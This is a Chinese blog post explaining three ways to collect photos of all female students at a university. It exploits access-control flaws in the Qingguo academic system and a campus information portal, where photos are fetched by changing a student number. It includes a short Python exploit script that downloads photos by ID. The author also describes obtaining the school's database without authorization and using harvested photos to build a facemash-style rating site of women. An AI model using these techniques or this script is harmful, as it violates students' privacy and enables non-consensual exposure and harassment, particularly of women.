获取全校女生照片的三种方式

1.学校的教务系统使用的是青果教务系统。早期的青果教务系统是绝对路径储存每个人的照片的。类似于http://jw.xxxx.edu.cn/_photo/student/学号.JPG。直接修改路径对应学号就可以看到对应学生的照片。(已修复)乌云


2.青果教务系统官方修复了这个漏洞。而修复的方式只是在学号后面增加了一些随机的字母。虽然还是绝对路径,但是想要看别人的照片就显得不是特别的容易。很凑巧,我在检测某网站是获取到了学校青果的数据库信息。并且把所有的女生的照片的链接下载了下来创办了我校的facemash网站。

但是缺点是,教务系统的照片是英语四级的照片,导致很多英语专业的只考专业英语的妹子们都没有照片。

3.信息门户系统 http://my.xxxx.edu.cn/

权限管理不严 只要是登陆进去(Cookie验证)

http://my.xxxx.edu.cn/attachmentDownload.portal?notUseCache=true&type=userFace&ownerId=学号

就可以下载任何人的照片。这套系统直接是使用的高考采集信息时的照片,虽然比较早,但是填补了之前英语专业照片不全的现象!

python exp:

import requests

n = raw_input('input the school number:')
url = r'http://my.xxxx.edu.cn/attachmentDownload.portal?notUseCache=true&type=userFace&ownerId='+n
headers = {'Cookie': r'*=*'}
a = requests.get(url,headers=headers)

with open("get.jpg", "wb") as code:
     code.write(a.content)

发表评论

电子邮件地址不会被公开。 必填项已用*标注